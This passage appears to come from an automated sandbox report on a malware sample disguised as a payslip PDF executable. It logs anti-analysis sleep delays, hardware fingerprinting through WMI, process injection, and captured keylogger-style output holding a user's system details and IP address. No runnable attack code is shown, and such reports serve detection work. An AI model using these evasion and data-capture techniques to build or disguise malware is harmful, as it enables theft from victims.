                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -594985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -594860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -594735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -594606s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -594397s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -594282s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -594157s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598953Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598719Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598606Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598484Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598366Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598191Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 598068Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597938Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597813Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597688Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597563Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596871Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596438Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596313Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595969Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595856Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595730Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595526Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595313Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594969Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594749Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594640Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594531Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594422Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594313Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594188Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeThread delayed: delay time: 594078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598076Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596749Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596526Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596420Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596283Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596035Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595670Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594900Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594794Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594681Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599649Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597248Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596998Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594606Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594397Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594282Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594157Jump to behavior
                    Source: sgxIb.exe, 00000008.00000002.4491421148.0000000001498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4490676412.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2250372221.000000000109C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeMemory written: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess created: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe "C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q9<b>[ Program Manager]</b> (04/11/2024 18:06:09)<br>{Win}rTHbq
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 11/17/2024 21:53:38<br>User Name: user<br>Computer Name: 960781<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 173.254.250.69<br><hr><b>[ Program Manager]</b> (04/11/2024 18:06:09)<br>{Win}r</html>
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q8<b>[ Program Manager]</b> (04/11/2024 18:06:09)<br>{Win}THbq
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q3<b>[ Program Manager]</b> (04/11/2024 18:06:09)<br>
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
